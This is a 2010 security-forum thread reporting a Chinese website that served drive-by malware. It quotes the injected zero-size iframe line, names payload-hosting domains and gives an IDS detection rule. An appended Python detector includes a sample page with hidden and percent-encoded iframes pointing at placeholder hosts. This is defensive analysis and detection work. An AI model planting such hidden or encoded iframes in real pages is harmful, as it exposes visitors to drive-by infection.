Topic: Dangerous Chinese site with iFrame malware...


polonus
Dangerous Chinese site with iFrame malware...
« on: July 05, 2010, 09:33:20 PM »
Hi malware fighters,

See unmasked pirates report for 021web*com*cn
    Of the 217 pages we tested on the site 2 pages resulted in malicious software being downloaded and installed without user consent. The last time suspicious content was found on this site was on 2010-07-04.

    Malicious software includes 1116 exploits, 1101 scripting exploits, 5 trojans. Successful infection resulted in an average of 6 new processes on the target machine.

    Malicious software is hosted on 11 domains, including dwefsd.com/, 92mimi4.cn/, wdf345.3322.org/.

    This site was hosted on 1 network including AS4812 (CT).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, 021web.com.cn appeared to function as an intermediary for the infection of 246 site(s) including vannghevietnam.vn/, dongnai.gov.vn/, 1081.com.vn/.

Has this site hosted malware?

    Yes, this site has hosted malicious software over the past 90 days. It infected 185 domains, including vannghevietnam.vn/, dongnai.gov.vn/, vietbalo.vn/.

How did this happen?

    In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Infection details:

MD5:    873fab89c387bd0d2225a5689f152e81
Infection Type:    IFRAME
Description:    A malicious IFRAME can source in content from web pages that attempt to fingerprint and exploit a browser vulnerability or client/OS vulnerability to cause a drive-by-download. Such IFRAMEs are typically invisible to users.
Code Length:    75 bytes
Code Sample:    
Top-level URL <iframe src=htxp://021web.com*cn/about.html width=0 height=0>
=== Triggered rule ===
alert(url_content:"%3Ciframe"; nocase; msg:"<iframe> tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
htxp://www.google.com/search?client=flock&channel=fds&q=Infection+Details++MD5%3A+%09873fab89c387bd0d2225a5689f152e81+Infection+Type%3A+%09IFRAME+Description%3A+%09A+malicious+IFRAME+can+source+in+content+from+web+pages+that+attempt+to+fingerprint+and+exploit+a+browser+vulnerability+or+client%2FOS+vulnerability+to+cause+a+drive-by-download.+Such+IFRAMEs+are+typically+invisible+to+users.+Code+Length%3A+%0975+bytes+Code+Sample%3A+%09+Top-level+URL+%3Ciframe+src%3Dhttp%3A%2F%2F021web.com.cn%2Fabo+ut.html+width%3D0+height%3D0%3E&ie=utf-8&oe=utf-8&aq=t

If you enter this request, it is flagged by avast as: S:ScriptPE-inf [Trj]

iFrame detecting scan:
No zeroiframes detected!
Check took 11.38 seconds

(Level: 0) Url checked:
htxp://021web.com.cn
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://021web.com.cn/template/index_js.html
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://021web.com.cn/js/mainad.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://021web.com.cn//count/get_count.asp?action=all
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://s27.cnzz.com/stat.php?id=602762&web_id=602762 (suspicious code see attached image)
Zeroiframes detected on this site: 0
No ad codes identified

Avast Networkshield is your friend and protector here, because we cannot connect there:

polonus
« Last Edit: July 05, 2010, 09:35:17 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

superhacker
Re: Dangerous Chinese site with iFrame malware...
« Reply #1 on: July 05, 2010, 09:45:11 PM »
God bless you polonus. 8)
Dreams don't die, they just fall asleep.

DavidR
Re: Dangerous Chinese site with iFrame malware...
« Reply #2 on: July 05, 2010, 10:14:59 PM »
Do you not think it would be a good idea to keep such posts in a single topic, making it easier to reference/find?
A bit like the Updates, Interesting software, Security, etc. etc.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

superhacker
Re: Dangerous Chinese site with iFrame malware...
« Reply #3 on: July 05, 2010, 10:19:57 PM »
It is a good idea, but I think if they don't get stacked, a small number will attach and see it, so it is nicer now.

polonus
Re: Dangerous Chinese site with iFrame malware...
« Reply #4 on: July 05, 2010, 10:29:16 PM »
Hi Superhacker,

We could also discuss the "%3C%69%66%" type of malware code; you see where your two scripts come in handy now, my friend. WordPress software malcode: http://wordpress.org/support/topic/327326
http://cpansearch.perl.org/src/WORRALL/Net-Analysis-0.41/t/t1_google.hex
http://www.prevx.com/blog/132/Compromised-FTP-details-being-exploited-by-in-the-wild-malware.html

There are so many in-routes to an interesting malcode discussion, and we the posters do have to find the various patterns at once to do a "quick and dirty" for the victims,

for instance this script (with some 1,560 Google results), described here:
http://wam.dasient.com/wam/infection_library/e59265d71b18d86665437ab32d20436a/postfolkovs

polonus
« Last Edit: July 05, 2010, 10:35:02 PM by polonus »
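As an added example, written for this thread and not code from the forum, from avast or from any scanner named above, the Python script below does on a local HTML sample what the zero-iframe scan in the first post and the `%3Ciframe` rule quoted there do. It flags `<iframe>` tags whose width or height is 0 or whose style hides them, decodes percent-encoded markup such as the `%3C%69%66%...` ("<if...") sequences polonus mentions in reply #4 so that iframes written from `document.write(unescape(...))` are caught too, and shows that the URL rule fires on any URL carrying an encoded `<iframe ...>`, including a search for the report text. The sample page, the search URL and every hostname are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Attribute values that make an iframe effectively invisible: "0", "00", "0px".
ZERO_SIZE = re.compile(r"^\s*0+(px)?\s*$", re.I)
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# The "%3Ciframe.*%3E" URL rule quoted in the first post, as a regex.
ENCODED_IFRAME_IN_URL = re.compile(r"%3Ciframe.*%3E", re.I)


def percent_decode_all(text, max_rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <) until the text stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


class HiddenIframeFinder(HTMLParser):
    """Collects <iframe> tags that are zero-sized, hidden by style, or written
    from script as percent-encoded markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            return
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if ZERO_SIZE.match(a.get("width", "")) or ZERO_SIZE.match(a.get("height", "")):
            reasons.append("zero-size")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        if reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies are opaque to the HTML parser, so decode any percent-encoded
        # markup in them (the "%3C%69%66%72..." = "<ifr..." trick) and scan the result
        # with a fresh parser; findings are tagged so the obfuscation is visible.
        if self._in_script and "%" in data:
            decoded = percent_decode_all(data)
            if "<iframe" in decoded.lower():
                inner = HiddenIframeFinder()
                inner.feed(decoded)
                inner.close()
                for f in inner.findings:
                    self.findings.append({"src": f["src"],
                                          "reasons": f["reasons"] + ["percent-encoded"]})


def scan_html(page):
    """Return a list of {'src', 'reasons'} dicts for every suspicious iframe in page."""
    finder = HiddenIframeFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


def url_rule_matches(url):
    """True when the URL carries a percent-encoded <iframe ...> tag, like the quoted rule."""
    return bool(ENCODED_IFRAME_IN_URL.search(url))


# Constructed sample page; every hostname is a placeholder, not a real site.
SAMPLE_PAGE = """<html><body>
<h1>Constructed sample page</h1>
<iframe src="http://video.example/embed/1" width="640" height="360"></iframe>
<iframe src=http://dropper.example/about.html width=0 height=0></iframe>
<iframe src="http://dropper.example/x.html" style="display:none"></iframe>
<script type="text/javascript">
document.write(unescape("%3C%69%66%72%61%6D%65 src=http://dropper.example/y.html width=0 height=0%3E"));
</script>
</body></html>"""

# Constructed search URL whose query quotes the code sample, as the first post describes.
SAMPLE_SEARCH_URL = ("http://www.example.com/search?q=Code+Sample+%3Ciframe+src%3Dhttp%3A%2F%2F"
                     "dropper.example%2Fabout.html+width%3D0+height%3D0%3E")

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f["src"], ",".join(f["reasons"]))
    print("URL rule fires on the search URL:", url_rule_matches(SAMPLE_SEARCH_URL))
```

The visible 640x360 frame is left alone; the three hidden ones are reported with the reason they were flagged. The URL rule matching the benign search is exactly the behaviour polonus observed: it keys on the encoded tag text, not on where the text came from, so a detection built on it needs the page context (or a confirmed zero-size frame) before it is treated as an infection.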